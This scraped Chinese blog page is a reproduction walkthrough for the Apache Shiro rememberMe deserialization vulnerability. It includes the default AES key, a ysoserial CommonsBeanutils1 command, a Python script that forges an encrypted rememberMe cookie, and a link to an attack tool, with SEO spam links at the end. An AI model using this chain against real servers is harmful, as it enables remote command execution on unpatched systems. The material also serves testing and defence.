当前位置: 首页 > news >正文

建站的平台下载百度 安装

建站的平台,下载百度 安装,充值网站怎么做,wordpress b站播放器一、漏洞特征 Apache Shiro是一款开源强大且易用的Java安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。 因为在反序列化时,不会对其进行过滤,所以如果传入恶意代码将会造成安全问题 在 1.2.4 版本前, 加…

一、漏洞特征
Apache Shiro是一款开源强大且易用的Java安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。
因为在反序列化时,不会对其进行过滤,所以如果传入恶意代码将会造成安全问题
在 1.2.4 版本前, 加密的用户信息序列化后存储在名为remember-me的Cookie中,而且是默认ASE秘钥,Key: kPH+bIxk5D2deZiIxcaaaA==,可攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。
而在1.2.4之后,ASE秘钥就不为默认了,需要获取到Key才可以进行渗透
总结一句话:ASE秘钥不能使用已知的外部秘钥,不能泄露秘钥。

影响版本Apache Shiro <= 1.2.4
漏洞特征:
shiro反序列化的特征:在返回包的 Set-Cookie 中存在 rememberMe=deleteMe 字段
进入后可以看到有remenber me的登录首页
在这里插入图片描述

二、漏洞复现
1.登录抓包拦截
同时勾选remenber me
在这里插入图片描述在这里插入图片描述

2.生成ser文件
使用ysoserial生成CommonsBeanutils1的Gadget
java -jar ysoserial-master-SNAPSHOT.jar CommonsBeanutils1 “touch /tmp/succ123” > poc.ser
在这里插入图片描述

3.使用poc生成payload

import sys
import uuid
import base64
from Crypto.Cipher import AESdef encode_rememberme():f = open('poc.ser','rb')BS = AES.block_sizepad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")iv = uuid.uuid4().bytesencryptor = AES.new(key, AES.MODE_CBC, iv)file_body = pad(f.read())base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))return base64_ciphertextif __name__ == '__main__':payload = encode_rememberme()   
print("rememberMe={0}".format(payload.decode()))

在这里插入图片描述

4.将生成的payload替换到请求包cookie中
在这里插入图片描述

5.进入搭建靶机的机器,查看生成文件
在这里插入图片描述

三、工具利用
https://github.com/SummerSec/ShiroAttack2
在这里插入图片描述在这里插入图片描述

http://www.mmbaike.com/news/110414.html

相关文章:

  • 宝安石岩网站建设免费推广网站大全下载
  • 做计算机网站有哪些安卓手机优化软件哪个好
  • 怎样做带音乐的表白网站软件怎么推广
  • 电影网站做cpa2020国内十大小说网站排名
  • wordpress作者信息栏优化营商环境评价
  • 2b网站推广怎么做优秀网站设计欣赏
  • 石家庄网站建设远策科技做网站建设的公司
  • 人事怎么做招聘网站比对分析6个好用的bt种子搜索引擎
  • 贵州网站建设营销公司滨州seo排名
  • 百度站长工具有哪些长沙seo推广优化
  • 可以接单做网站的软件自己手机怎么免费做网站
  • 游戏平台代理东莞seo优化排名推广
  • wordpress上传出错北京网站建设优化
  • 档案网站建设的意义网店培训
  • 聊城 网站建设阿里云免费域名
  • 将制作好的网站上传去因特网自创网站
  • 微信微网站是什么格式的优化网站制作方法大全
  • 南京做信息登记公司网站网络销售推广平台
  • 设计做网站填写电话的广告
  • 南京专业做网站的公司哪家好中国联通腾讯
  • 做打鱼网站需要多少钱网站百度权重查询
  • 香港网站区别适合推广的app有哪些
  • wordpress网站建设教程搜索竞价托管
  • 做行测的网站搜索引擎优化seo多少钱
  • wordpress 文章 路径免费使用seo软件
  • seo整站优化网站建设百度网盘资源搜索入口
  • 网站怎么做网络推广哈尔滨seo优化公司
  • 买CAD设计图做的网站百度推广账户优化方案
  • 怎样通过网址浏览自己做的网站上海企业seo
  • net网站同时支持 生成静态文件和伪静态淮南网站seo